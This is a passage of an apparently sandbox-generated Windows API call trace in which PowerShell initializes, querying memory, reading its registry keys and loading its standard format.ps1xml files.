	[0273.905] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.907] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.907] VirtualQuery (in: lpAddress=0x20bce0, lpBuffer=0x20cba0, dwLength=0x30 | out: lpBuffer=0x20cba0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.907] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0273.908] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.367] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.368] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.368] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.373] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0276.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.373] CoTaskMemFree (pv=0x4ae670) 
	[0276.374] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.379] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.379] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.379] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.379] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.380] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.380] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.381] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.382] VirtualQuery (in: lpAddress=0x20bcd0, lpBuffer=0x20cb90, dwLength=0x30 | out: lpBuffer=0x20cb90*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.382] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d188 | out: phkResult=0x20d188*=0x1c4) returned 0x0
	[0276.382] RegQueryValueExW (in: hKey=0x1c4, lpValueName="path", lpReserved=0x0, lpType=0x20d19c, lpData=0x0, lpcbData=0x20d198*=0x0 | out: lpType=0x20d19c*=0x1, lpData=0x0, lpcbData=0x20d198*=0x74) returned 0x0
	[0276.382] RegQueryValueExW (in: hKey=0x1c4, lpValueName="path", lpReserved=0x0, lpType=0x20d10c, lpData=0x0, lpcbData=0x20d108*=0x0 | out: lpType=0x20d10c*=0x1, lpData=0x0, lpcbData=0x20d108*=0x74) returned 0x0
	[0276.382] CoTaskMemAlloc (cb=0x78) returned 0x446640
	[0276.383] RegQueryValueExW (in: hKey=0x1c4, lpValueName="path", lpReserved=0x0, lpType=0x20d0dc, lpData=0x446640, lpcbData=0x20d0d8*=0x74 | out: lpType=0x20d0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d0d8*=0x74) returned 0x0
	[0276.383] CoTaskMemFree (pv=0x446640) 
	[0276.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0276.383] SetErrorMode (uMode=0x1) returned 0x1
	[0276.383] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0276.383] SetErrorMode (uMode=0x1) returned 0x1
	[0276.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.383] SetErrorMode (uMode=0x1) returned 0x1
	[0276.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.384] SetErrorMode (uMode=0x1) returned 0x1
	[0276.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.384] SetErrorMode (uMode=0x1) returned 0x1
	[0276.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.384] SetErrorMode (uMode=0x1) returned 0x1
	[0276.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.384] SetErrorMode (uMode=0x1) returned 0x1
	[0276.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.384] SetErrorMode (uMode=0x1) returned 0x1
	[0276.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.385] SetErrorMode (uMode=0x1) returned 0x1
	[0276.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0276.385] SetErrorMode (uMode=0x1) returned 0x1
	[0276.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0276.385] SetErrorMode (uMode=0x1) returned 0x1
	[0276.385] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0276.385] SetErrorMode (uMode=0x1) returned 0x1
	[0276.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.386] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.386] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.386] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0276.386] SetErrorMode (uMode=0x1) returned 0x1
	[0276.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0276.387] SetErrorMode (uMode=0x1) returned 0x1
	[0276.387] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d060 | out: lpFileInformation=0x20d060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0276.387] SetErrorMode (uMode=0x1) returned 0x1
	[0276.387] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0276.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.387] CoTaskMemFree (pv=0x4ae670) 
	[0276.928] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0276.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.928] CoTaskMemFree (pv=0x4ae670) 
	[0276.929] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0276.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.929] CoTaskMemFree (pv=0x4ae670) 
	[0276.929] CoTaskMemAlloc (cb=0x104) returned 0x4ae670
	[0276.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4ae670, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.929] CoTaskMemFree (pv=0x4ae670) 
	[0276.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.930] SetErrorMode (uMode=0x1) returned 0x1
	[0276.930] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0276.930] GetFileType (hFile=0x1cc) returned 0x1
	[0276.930] SetErrorMode (uMode=0x1) returned 0x1
	[0276.930] GetFileType (hFile=0x1cc) returned 0x1
	[0276.930] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.932] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.932] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.932] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x9e2, lpOverlapped=0x0) returned 1
	[0276.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x327c7c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327c7c2*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0276.933] ReadFile (in: hFile=0x1cc, lpBuffer=0x327d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x327d278*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0276.934] CloseHandle (hObject=0x1cc) returned 1
	[0276.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.934] SetErrorMode (uMode=0x1) returned 0x1
	[0276.934] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.934] SetErrorMode (uMode=0x1) returned 0x1
	[0276.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.934] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1cc) returned 0x0
	[0276.934] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0276.934] CoTaskMemAlloc (cb=0x5a) returned 0x1b785f50
	[0276.934] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x1b785f50, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0276.935] CoTaskMemFree (pv=0x1b785f50) 
	[0276.935] RegCloseKey (hKey=0x1cc) returned 0x0
	[0276.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.941] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe9628ba8, Data2=0x8d2d, Data3=0x48eb, Data4=([0]=0xac, [1]=0x6c, [2]=0xe4, [3]=0xa9, [4]=0x55, [5]=0x24, [6]=0x14, [7]=0x85))) returned 0x0
	[0276.957] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf5df31c8, Data2=0x74eb, Data3=0x461c, Data4=([0]=0xb2, [1]=0xb6, [2]=0xd9, [3]=0x86, [4]=0x3f, [5]=0x53, [6]=0x12, [7]=0xa8))) returned 0x0
	[0276.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.960] SetErrorMode (uMode=0x1) returned 0x1
	[0276.960] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0276.960] GetFileType (hFile=0x1cc) returned 0x1
	[0276.960] SetErrorMode (uMode=0x1) returned 0x1
	[0276.960] GetFileType (hFile=0x1cc) returned 0x1
	[0276.960] ReadFile (in: hFile=0x1cc, lpBuffer=0x32a7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x32a7de0*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
